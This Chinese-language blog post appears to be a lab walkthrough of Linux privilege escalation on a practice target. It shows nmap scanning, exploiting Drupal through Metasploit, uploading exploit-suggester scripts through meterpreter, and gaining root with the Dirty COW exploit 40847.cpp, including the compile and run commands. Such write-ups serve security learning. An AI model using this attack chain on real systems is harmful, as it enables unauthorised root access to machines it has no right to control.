Author:liyue
TIME:2021-11-10
linux-脏牛
0x01、正文
上午看完了小迪安全的 linux提权操作:SUID 和脏牛提权。
linux最常用的两种提权方式之一。现在将之前学的SUID 和脏牛提权分别总结,然后结合靶场实际学习一下。
脏牛提权 属于linux 内核提权方式之一,使用于linux->web 环境下。
脏牛提权利用的漏洞版本为CVE-2016-5195,影响的系统为:
使用的时候可以根据linux漏洞扫描脚本(linux-exploit-suggester-2-master)进行扫描判断。
0x02、靶场
一、信息收集
1、使用 arp -a -l 对本地ip进行扫描 ,扫描出来结果为172.20.10.2端口为靶场地址(注意配置个人网关信息)
2、nmap扫描端口 发现开启22 openssh端口 并且显示系统版本ubuntu 2.7 openssh 6.6.1
这里使用的nmap -p 1-65535 172.20.10.2 开启全端口扫描
3、根据这些我几句想到openssh中可能会有什么可以进行利用 或者 80端口中给出什么可以用的信息,我们先看看80端口
80端口:80给出的就是一个简单的界面,80端口放弃,不知道有什么
接下来使用了目录爆破 连接不到80端口 ,马上转下一个
22端口:
openssh6.6.1
(注意这个端口号)
1898 端口:
通过1898端口进入到drupal框架,drupal框架 由php搭建的CMS属于国外最常见的CMS之一,根据这种drupal框架,直接进入MSF漏洞库去查进行利用。
提出问题:drupal框架如何发现,drupal框架如何使用?
drupal框架:现在这个端口在1898上
启动MSF操作:
search drupal 对drupal漏洞进行查找。可以发现很多drupal的可利用漏洞。(这里在给一个小想法,如果我们不知道怎么找到合适的漏洞 ,那就看看这个网站搭建的时间)
显示时间 2018/04/20 对应漏洞库中最常见的时间是 2018-03-28,直接进行利用(排查)
二、上传linux探针
设置好之后,run,等待会话,会话连接上之后上传linux漏洞探针。
信息收集
1、先查看内核版本 命令:uname -a。内核版本显示为Linux 4.4.0
1-2 、上传了LinEnum.sh 查看linux具体信息。
漏洞探针
1、上传linux-exploit-suggester-2.pl
meterpreter > upload /tmp/linux-exploit-suggester-2.pl /tmp/1.pl[*] uploading : /tmp/linux-exploit-suggester-2.pl -> /tmp/1.pl[*] Uploaded -1.00 B of 23.72 KiB (-0.0%): /tmp/linux-exploit-suggester-2.pl -> /tmp/1.pl[*] uploaded : /tmp/linux-exploit-suggester-2.pl -> /tmp/1.plmeterpreter > pwd/var/www/htmlmeterpreter > cd /var/www/htmlmeterpreter > lsListing: /var/www/html
2、上传 linux-exploit-suggester.sh(这个版本的探针会更加详细,而且会将成功率更高的漏洞标出来)
meterpreter > upload /tmp/linux-exploit-suggester.sh /tmp/2.sh[*] uploading : /tmp/linux-exploit-suggester.sh -> /tmp/2.sh[*] Uploaded -1.00 B of 86.81 KiB (-0.0%): /tmp/linux-exploit-suggester.sh -> /tmp/2.sh[*] uploaded : /tmp/linux-exploit-suggester.sh -> /tmp/2.shmeterpreter > shellProcess 16106 created.Channel 4 created.ls1.pl2.shchmod +x 2.sh./2.sh
漏洞探针结果:CVE-2016-5195 linux脏牛使用
三、漏洞利用
通过下载40611.c ,使用MSF上传到靶机中。上传上去之后可以查看一波。
upload /tmp/40611.c /tmp/40611.c//上传之后进入tmp目录
(漏洞利用失败) 可以看到需要使用的sudo 当然 没得用。所以放弃这个
然后除此之外 小迪课程中使用的是:https://www.jianshu.com/p/df72d1ee1e3e(来自简书的文章)这里的脏牛提权第二个连接,下载dcow.cpp
网上文件中给出的是mk进行编译,但是我们这里只能使用gcc编译dcow.cpp 文件
这个也不能使用,我打开源文件看了一下
成功 40847.cpp的利用 成功:
根据linux 漏洞探针给出的exp进行利用
exp利用方式:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutilpython -c 'import pty; pty.spawn("/bin/bash")'./dcow
提权成功
如何领取
防止链接失效,公众号后台回复【linux提权工具】获取linux提权工具,回复【linux提权手法总结】获取linux提权pdf,回复【加群】可加入交流群一起学习。
原文始发于微信公众号(鹏组安全):靶机实战--linux提权之SUID&脏牛(二)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论